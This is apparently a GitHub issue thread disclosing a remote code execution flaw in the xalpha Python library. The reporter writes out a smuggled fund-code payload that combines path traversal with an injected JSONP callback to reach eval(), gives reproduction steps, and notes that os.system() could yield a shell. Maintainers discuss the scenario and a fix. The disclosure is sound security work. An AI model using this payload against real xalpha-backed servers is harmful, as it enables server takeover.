[Warning] RCE in xalpha v0.11.4 ~ v0.11.8 #175
Comments
|
Thanks for the thorough report. The quickest fix is to first check the Besides, can you see any scenario that the current issue can have realistic security issues? Because to me, the fundinfo code is written by the users themselves. |
|
Ah, i think i see your point now. The scenario could be someone who host a website using xalpha as backend, then when the use input some weird fund code, the backend server can run something very bad if the server has no check on the user's input more than bare xalpha. In this case, the loophole can be used to weaken the server (say a fund summary website backend by xalpha, if any) |
|
Actually you could just check the code format when initiating fundinfo, you can simply avoid this vulnerability in this way. But I suggest you replace eval() with safer functions to prevent vulnerabilities that may occur in the future. yeah, if someone host a website using xalpha as backend, The attackers could use the above methods to directly obtain server permissions (attackers could use functions such as os.system() to execute cmd and directly obtain the cmd shell.) |
Leeyangee
changed the title
|
shall be fixed in 0.11.9 |
Vulnerability Product: xalpha v0.11.4 ~ v0.11.8
Vulnerability version: v0.11.4 ~ v0.11.8
Vulnerability type: Remote Command Execute
Vulnerability Details:
Vulnerability location: xalpha/info.py -> fundinfo._basic_init
without verifying the code user input and using dangerous function eval();, causes rce in xalpha v0.11.4 ~ v0.11.8 at xalpha/info.py -> fundinfo._basic_init
payload =
../gaoduan/PinzhongRightApi.aspx?fc=AF5097&callback=jQuery183037745026472073073_ Data_netWorthTrend = {your rce python command}; &_=1688890155531#test_payload =
../gaoduan/PinzhongRightApi.aspx?fc=AF5097&callback=jQuery183037745026472073073_ Data_netWorthTrend = print('hacked'); &_=1688890155531#let's take the latest version released in the Github v0.11.4 as an example
firstly pip3 install xalpha==0.11.4
secondly import xalpha
thirdly call xalpha.fundinfo("../gaoduan/PinzhongRightApi.aspx?fc=AF5097&callback=jQuery183037745026472073073_ Data_netWorthTrend = print('hacked'); &_=1688890155531#")
here take the test_payload as argument of the function
folloing you could see, it successfully run the py code
proved rce
Also you can prove rce in version 0.11.8, but v0.11.4 is a stable version
reason:
the self.url could be relocate path to / by ..
if you input the test_payload
../gaoduan/PinzhongRightApi.aspx?fc=AF5097&callback=jQuery183037745026472073073_ Data_netWorthTrend = print('hacked'); &_=1688890155531#, the path will be relocated to /gaoduan/PinzhongRightApi.aspx and callback, the re.match only check the body of responsenever check the position of data
so causes rce
discovered by leeya_bug
The text was updated successfully, but these errors were encountered: